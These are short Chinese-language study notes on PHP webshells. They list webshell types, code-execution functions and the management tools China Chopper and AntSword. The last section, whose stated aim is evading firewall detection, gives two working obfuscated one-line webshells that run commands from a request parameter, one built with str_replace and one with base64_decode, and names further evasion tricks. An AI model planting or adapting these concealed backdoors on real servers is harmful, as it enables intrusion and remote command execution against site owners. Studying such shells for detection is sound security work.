一、webshell介绍（网页木马）

分类：

大马：体积大、隐蔽性差、功能多

小马：体积小，隐蔽强，功能少

一句话木马：代码简短，灵活多样

二、一句话木马：

@：不显示函数错误信息

eval将一个满足php代码格式的字符串当作代码执行

执行代码函数：

eval、assert、preg_replace()、

create_function()、array_map()、

array_filter()

执行命令函数

system();

其他语言：

三、webshell管理工具：

中国菜刀、蚁剑

功能：

虚拟终端、文件管理、数据库管理、数据配置管理

四、webshell变形:
 

变形的目的：绕过防火墙的查杀

变形方法：(要会举一反三)

1、str_replace();

<?php

$a=str_replace("abc","","aabcsabcabsabceabcrt");

$a($_REQUEST[''cmd'']);

?>

2、base64_decode();

<?php

$a=base64_decode(''YXNzZXJ0'');

$a($_REQUEST[''cmd'']);

?>

3、“.”操作符

4、更换数据来源

creat_function()匿名函数